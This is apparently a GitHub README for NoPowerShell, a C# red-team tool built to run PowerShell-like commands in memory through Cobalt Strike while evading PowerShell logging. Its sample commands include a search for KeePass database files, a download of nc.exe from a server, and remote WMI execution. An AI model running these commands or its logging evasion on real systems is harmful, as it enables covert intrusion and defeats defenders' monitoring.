burnnotice / nopowershell

PowerShell rebuilt in C# for Red Teaming purposes

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries.

Moreover, this project makes it easy for everyone to extend its functionality using only a few lines of C# code.


Currently supported commands

Running in Cobalt Strike. NoPowerShell supported commands

Sample commands

NoPowerShell sample commands



When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (|) with respectively a caret (^) or a backtick (`), i.e.:

  • cmd.exe: ls ^| select Name
  • PowerShell: ls `| select Name


Action Command Notes
List help NoPowerShell.exe Alternative: NoPowerShell.exe Get-Command
View status of a service NoPowerShell.exe Get-WmiObject -Class Win32_Service -Filter "Name = 'WinRM'"
Search for KeePass database in C:\Users folder NoPowerShell.exe gci C:\Users\ -Force -Recurse -Include *.kdbx | select Directory,Name,Length
View system information NoPowerShell.exe systeminfo
List processes on the system NoPowerShell.exe Get-Process
Show current user NoPowerShell.exe whoami Unofficial command
List autoruns NoPowerShell.exe Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run
List network shares connected to from this machine NoPowerShell.exe Get-NetSmbMapping
Download file NoPowerShell.exe wget http://myserver.me/nc.exe When compiled using .NET 2 only supports SSL up to SSLv3 (no TLS 1.1+)
List PowerShell processes on remote system NoPowerShell.exe gwmi "Select ProcessId,Name,CommandLine From Win32_Process" -ComputerName dc1.corp.local | ? Name -Like "powershell*" | select ProcessId,CommandLine Explicit credentials can be specified using the -Username and -Password parameters
Execute program using WMI NoPowerShell.exe Invoke-WmiMethod -Class Win32_Process -Name Create "cmd /c calc.exe"

Install in Cobalt Strike

  1. Copy both NoPowerShell.exe and NoPowerShell.cna to the scripts subfolder of Cobalt Strike
  2. Launch Cobalt Strike and load the .cna script in the Script Manager
  3. Interact with a beacon and execute commands using the nps command

Known issues

  • Pipeline characters need to surrounded by spaces
  • TLS 1.1+ is not supported by .NET Framework 2, so any site enforcing it will result in a connection error


  • Fix above issues
  • Improve stability by adding exception handling
  • Support for parameter groups
  • Add support for ArrayArgument parameter
  • Add support for .NET code in commandline, i.e.: [System.Security.Principal.WindowsIdentity]::GetCurrent().Name


Add your own cmdlets by submitting a pull request.


  • Maintain .NET 2.0 compatibility in order to support the broadest range of operating systems


Use the TemplateCommand.cs file in the Commands folder to construct new cmdlets. The TemplateCommand cmdlet is hidden from the list of available cmdlets, but can be called in order to understand its workings. This command looks as follows: Get-TemplateCommand [-MyFlag] -MyInteger [Int32] -MyString [Value] and is also accessible via alias gtc.

Example usages

Action Command
Simply run with default values gtc
Run with the -MyFlag parameter which executes the 'else' statement gtc -MyFlag
Run with the -MyInteger parameter which changes the number of iterations from its default number of 5 iterations to whatever number is provided gtc -MyInteger 10
Run with the -MyString parameter which changes the text that is printed from its default value of 'Hello World' to whatever string is provided gtc -MyString "Bye PowerShell"
Combination of parameters gtc -MyInteger 10 -MyString "Bye PowerShell"
Combination of parameters - Alternative gtc -MyInteger 10 -MyString "Bye PowerShell"
Combination of parameters - Using fact that MyString is the only mandatory parameter for this command gtc -MyInteger 10 "Bye PowerShell"
Command in combination with a couple of data manipulators in the pipe gtc "Bye PowerShell" -MyInteger 30 | ? Attribute2 -Like Line1* | select Attribute2 | fl

Execute the following steps to implement your own cmdlet:

  1. Create a copy of the TemplateCommand.cs file.
    • In case you are implementing a native PowerShell command, place it in folder the corresponding to the Source attribute when executing in PowerShell: Get-Command My-Commandlet. Example of a native command: Get-Command Get-Process -> Source: Microsoft.PowerShell.Management -> Place the .cs file in the Management subfolder.
    • In case it is a non-native command, place it in the Additional folder.
  2. Update the TemplateCommand classname and its constructor name.
  3. Update the static Aliases variable to the command and aliases you want to use to call this cmdlet. For native PowerShell commands you can lookup the aliases using Get-Alias | ? ResolvedCommandName -EQ My-Commandlet to obtain the list of aliases. Always make sure the full command is the first "alias", for example: Get-Alias | ? ResolvedCommandName -EQ Get-Process -> Aliases are: Get-Process, gps, ps
  4. Update the static Synopsis variable to a small text that describes the command. This will be shown in the help.
  5. Update the arguments supported by the command by adding StringArguments, BoolArguments and IntegerArguments to the static SupportedArguments variable.
  6. In the Execute function:
    1. Fetch the values of the StringArguments, BoolArguments and IntegerArguments as shown in the examples;
    2. Based on the parameters provided by the user, perform your actions;
    3. Make sure all results are stored in the _results variable.
  7. Remove all of the template sample code and comments from the file to keep the source tidy.

Contributed NoPowerShell cmdlets

Authors of additional NoPowerShell cmdlets are added to the table below. Moreover, the table lists commands that are requested by the community to add. Together we can develop a powerful NoPowerShell toolkit!

Cmdlet Contributed by GitHub Twitter

Included NoPowerShell cmdlets

Cmdlet Category Notes
Get-SystemInfo Additional Few fields still need to be added to mimick systeminfo.exe
Get-Whoami Additional whoami.exe /ALL is not implemented yet
Get-Command Core
Where-Object Core
Copy-Item Management
Get-Content Management
Get-Process Management Quick & dirty implementation
Invoke-WmiMethod Management Quick & dirty implementation
Get-ChildItem Management
Get-ItemProperty Management
Get-WmiObject Management
Remove-Item Management
Get-NetIPAddress NetTCPIP
Get-NetRoute NetTCPIP
Test-NetConnection NetTCPIP
Get-SmbMapping SmbShare
Format-List Utility
Format-Table Utility
Invoke-WebRequest Utility
Select-Object Utility
Resolve-DnsName DnsClient Very basic implementation, support for specifying DNS server and query type need to be added

Authored by Arris Huijgen (@_bitsadmin - https://github.com/bitsadmin)


PowerShell rebuilt in C# for Red Teaming purposes

License:BSD 3-Clause "New" or "Revised" License


Language:C# 100.0%